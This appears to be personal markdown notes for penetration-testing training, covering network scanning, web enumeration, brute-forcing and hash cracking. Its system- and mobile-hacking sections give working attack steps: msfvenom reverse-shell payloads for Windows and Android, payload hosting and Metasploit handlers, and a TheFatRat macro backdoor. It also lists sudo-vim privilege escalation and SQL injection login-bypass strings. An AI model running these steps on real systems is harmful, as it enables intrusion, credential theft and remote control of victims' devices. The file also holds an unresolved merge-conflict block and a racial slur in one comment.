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File metadata and controls

463 lines (399 loc) · 12.8 KB


  • Footprinting
  • Scanning
  • Enumeration
  • Vulnerability Analysis
  • System Hacking ** Gaining Access **
  • Cracking passwords
  • Vulnerability Exploitation ** Escalating Privileges ** ** Maintaining Access **
  • Executing Applications
  • Hiding Files ** Clearing Logs **
  • Covering Tracks

Online Resources


host enumation

host and service enumeration

//discover devices inside the network eth0
netdiscover -i eth0
nmap -sN
// enumeration
netstat -a // netstat enumeration netbios
snmp-check // extract users from netbios - parrot

sudo nmap -vv -p 1-1000 -sC -A -oN nmap_scan
nmap -p- -sS -min-rate 10000 -Pn -n 10.10.10
nmap -6 // scan IPV6
nmap -sC -sV -vvv -T5 -p 80,21,2222 10.10.10
sudo nmap -v -sV -sC
nmap -Pn -sS -n 10.10.. -T4 -oN nmap_scan // [prefer] fast scan ufo mode
nmap -v -p- -sV -sC -T4 10.10 -oN nmap_scan // UDP/TCP scanning
sudo nmap -p- -Pn -vvv -sS 10.10.. -oN nmap_scan
nmap -sS -sV -A -O -Pn
nmap -sV -sT -sU -A 10.10.. -oN nmap_scan
sudo nmap -p- 10.10.. --open -oG nmap/AllPorts -vvv -Pn -n -sS
sudo nmap -p22,80 -sV -sC -Pn -n 10.10.. -oN nmap/openports -vvv
nmap -sV -p 22,443 10.10../24 // scan mi net 24
nmap -sU -p 161 -sV -sC 10.10.. // UDP Scan
nmap -A --min-rate=5000 --max-retries=5 10.10.. // optimize scan time
<<<<<<< HEAD
nmap -Pn -sS -A -oX test // Scanning the network and subnet

-PR = ARP ping scan
-PU = UDP ping scan
nmap -Pn -sS -A -oX test 10.10.../24 // scanning network subnet

snmp //extract users of the network port 161

-PR = ARP ping scan
-PE = ICMP scan echo
-PU = UDP ping scan
-oX = save XMl
>>>>>>> df364a4f409faf7bc6bb4b291db58d3dcabb2bb9
-vv = verbose
-p = ports
-sC = default scripts
-A = agressive scan
-oN = save in a file
-sS = syn scan is untrusive because don't complete the petitions
-n = no resolution of dns
-p- = all ports
-sV = Probe open ports to determine service/version inf
-T4 = Timing scanning <1-5>
-o = output to save the scan
-sT = TCP port scan
-sU = UDP port scan
-A = Agressive/ OS detection  
--open = all ports open
-oG = save in a grep format
-Pn = no do ping to the ip
-n = dont resolve domain names
--max-retries = 1 default verify 10 times.
-O = verifica el sistema operativo

// My niggerian methodology
nmap -sV -sC nmap 10.10.10.x #top1000ports
nmap -sC -sV -v -oN nmap.txt
masscan -e tun0 -p1-65535 -rate=1000 <ip>
sudo nmap -sU -sV -A -T4 -v -oN udp.txt ip

default ports

port name
3306 mysql --script mysql-info mysql-enum
3389 rdp port remote port
25 smtp mail
80 http
443 https
20 ftp
23 telnet
143 imap
22 ssh
53 dns

Web Enumeration

// dir enumeration
gobuster dir -u 10.10.. -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt -q

dir : directory listing
-u : host
-w : wordlists
-t : threads int / Number of concurrent threads (default 10)
-x : enumerate hidden files htm, php
-q : –quiet / Don’t print the banner and other noise

// wordpress enumeration
wpscan --url --passwords=
wpscan -u 10.10.. -e u vp
wpscan -u 10.10.. -e u --wordlist path/rockyou.txt //bruteforce

-e = enumerate
u = enumerate usernames
vp = vulnerable plugins

// wordlist generation
cewl -w wordlist -d 2 -m 5
-d = deeph of the scanning
-m = long of the words
-w = save to a file worlist

web explotation

// sql injection
sqlmap -u --forms --dump

-u = url
--forms = grab the forms /detect
--dump = retrieve data form de sqli

#### basic sqli injection
sqlmap -u --forms --dump

- u = url
- --forms= check the forms automatically
- --dump= dump dthe database data entries

// extract database
sqlmap -u --dbs
// extract colums
Sqlmap -u --D (tabla) --T artists --columns
// extract data of the table and the column inside of the db
sqlmap -u --D (tabla) --T artist --C adesc, aname, artist_id --dump




hydra -t4 -l lin -P /usr/share/wordlists/rockyou.txt ssh:
hydra -l lin -P /usr/share/wordlists/rockyou.txt ssh:


exiftool cats.png
zsteg cats.png
binwalk -d cats.png

// windows
snow -C -p "magic" readme2.txt
-p = passowrd
//image steganography
openstego > extract dat > 

//stegseek to crack stego password

windows rpc mal configurado




hashcat -O -w3 -m 0 56ab24c15b72a457069c5ea42fcfc640 /usr/share/wordlists/rockyou.txt --show

-m = type of hash
-a = attack mode (1-3) 3 bruteforcing
--show = mostrar hash crackeado

hashcat -O -A 0 -m 20 salt12314124:passowrdmd523432 /usr/share/worlist/rockyou.txt
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show


john --format=Raw-MD5 hash --wordlist=/usr/share/wordlists/rockyou.txt

- --format = hash format '--list=formats | grep MD5'
- hash = file - echo '123213dasd' >> hash
- wordlist= = wordlist to crack

### to show the hash cracked
john --show --format=Raw-MD5 hash

- --show = show the hash:Cracked


take a file and open into hashcalc
i will give you the the hash for md5 or other algorithms

// MD5 calculator
it will compare both files what we need get the md5

// HashMyFiles
it allow you to hash all the files inside a folder

// Veracrypt


Rainbowtables are already hash with password to perform cracking without calculate a new hash.
// linux
rtgen // rainbowcrack
rtgen sha256 loweralpha-numeric 1 10 0 1000 4000 0 // generate a new rainbow table
// windows
rtgen md5 loweralpha-hnumeric 1 4 1 1000 1000 0 //
then use app rainbowcrack // add the hashes and the rainbow table option

enumerating -samba

search for commands
smbmap --help | grep -i username

smbmap -u "admin" -p "passowrd" -H -x "ipconfig"
-x = command


### wireshark filters

// filters by post
smtp // email
pop // email
dns.qry.type == 1 -T fields -e = show records present in this pcap
dns.flags.response == 0 = There are 56 unique DNS queries.
tcp // show tcp packets
//find packets
edit > find packets > packet list : packet bytes > case sensitive: strings > string "pass" :search

look number of packets first column
then >statistics > ipv4 statistics > destination and ports

/// tshark cli
tshark -r dns.cap | wc -l //count how many packets are in a capture
tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e //show records present in this pcap
tshark -r dnsexfil.pcap -Y "dns.flags.response == 0" | wc -l 
tshark -r pcap -T fields -e | uniq | wc -l //There are 56 unique DNS queries.
tshark -r pcap | head -n2 //DNS server side to identify 'special' queries
tshark -r pcap -Y "dns.flags.response == 0" -T fields -e "" | sed "s/" | tr -d "\n" `exfiltrate data with regx`

Privilege scalation reverse shell

ssh -p 2222 mith@
sudo -ls ###list de su permisions

sudo vim -c ':!/bin/sh' ### privilege scalation


hydra -l root -P passwords.txt [-t 32] ftp
hydra -L usernames.txt -P pass.txt mysql
hashcat.exe -m hash.txt rokyou.txt -O
nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput 0.10.10 
wpscan --url --enumerate u
netdiscover -i eth0
john --format=raw-md5 password.txt [ To change password to plain text ]

vulnerability scanning

nikto -h url -Cgidirs all

System hacking

// 1 - on a windows machine
wmic useraccount get name,sid //list users
// using a tool
Pwdump7.exe >> /path/file.txt //get a file to crack
// using ophcrack to crack the hash with rainbow tables
ophcrack >> tables >> vista free
// cracking with rainbow tables using winrtgen to create a rainbow table
winrtgen >> add table >> hashntlm
rainbowcrack >> select the obtained file >> select dircreatd with winrtgen

// 2 - using responder to capture the traffic of the windows system
//run a shared folder on windows
//capture the ntlm hash >> cracking with jhon
chmod +x
./ -I eth0
-I = interface //ifconfig
// cracking the ntlm capture with ntlm
john capture.txt

lopthcr4ck // helps to crack ntlm passwords store on windows

// system hacking windows
// look for an exploit and try to get remote access to the victim using msfvnom,metasploit and rat

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
-p = payload
--platform = Os
-a = architecture
-f = format of the payload
-o = output dir

// now with try to share the file with the victim
// we try three forms
// #1 - option
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
// copy the text.exe to the new server
cp /root/Desktop/test.exe /var/www/html/share
// #2 - option
python -m SimpleHttpServer 80
// #3 - option
python3 http.server 80
// start the serverwith apache
service apache2 start //apache version
//now we open msfconsole to gain a inverse shell with meterpreter
use exploit/multi/handler //similar to nc -nlvp .port
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set LPORT my.port
exploit/run // run the exploit
//share the file with the victim
//inside the victim's machine
run the exe // text.exe share with the server
//look at the metasploit session
sysinfo // system info

//now with try to enumerate to know misconfigurations on the w10 system
//using PowerSploit
upload /path/PowerUp.ps1 powerup.ps1 // with meterpreter
shell // with shell with change from meterpreter to windows shell
// now we execute powerup
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
// now we know that windows is vulnerable to dll injection
// change to meterpreter shell with exit & run
run vnc // will open a VNC remote control on the victim

// Now we will try another method to gain access to a machine
// with TheFatRat
chmod +x fatrat
chmod +x
chmd +x
//run fatrat
option 6 // create fud.. [Excelent]
option 3 // create apache + ps1
//put the lhost and lport
enter the name for files : payload
option 3 // for choosing meterpreter/reverse_tcp
// payload generated
option 9 // back to the menu
option 7 // create a back office
option 2 // macro windows and select lhost and lport
// enter the name for the doc file
// use custom exe backdoor Y
option 3 // reverse_tcp 
// backdoor inside the doc generate

// share document with the server option 1 and 2 above
// start msfconsole to gain meterpreter shell
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST my.ip
set RHOST my.port
exploit / run 

Mobile Hacking

// create a backdoor with msfvenom
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=my.ip R > path/backdoor.apk
// share with some of the three methods above
// now with metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST my.ip
exploit -j -z // exploit with a background job
// install the apk in android & the session will open
sessions -i 1 // will display the meterpreter
sysinfo // to know the os

// Using PhoneSploit
run phonesploit
option 3 // new phone
enter the ip // ip' phone &
option 4 // to shell on the phone
//in the menu you can search, download, info

Using the methodology

  1. netdiscover -i eth0
  2. map -p- [ Any IP ] port discovery
  3. nmap -p443,80,53,135,8080,8888 -A -O -sV -sC -T4 -oN nmapOutput
  4. gobuster -e -u** -w wordlsit.txt on a webserver running
  5. trying sqli payloads on the forms
admin' --  
admin' #  
' or 1=1--  
' or 1=1#  
' or 1=1/*  
') or '1'='1--  
') or ('1'='1—
  1. bruteforcing web servers
hydra -l root -P passwords.txt [-t 32] <IP> **_ftp_**
hydra -L usernames.txt -P pass.txt <IP> **_mysql_**
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> **_pop3_** -V
hydra -V -f -L <userslist> -P <passwlist> **_rdp_**://<IP>
hydra -P common-snmp-community-strings.txt **_snmp_**
hydra -l Administrator -P words.txt **_smb_** -t 1
hydra -l root -P passwords.txt <IP> **_ssh_**
  1. cewl -m 5 -w words.txt custom wordlist
  2. search for vulns
searchsploit 'Linux Kernel'
searchsploit -m 7618 // Paste the exploit in the current directory
searchsploit -p 7618[.c] // Show complete path
searchsploit  nmap file.xml // Search vulns inside a Nmap XML result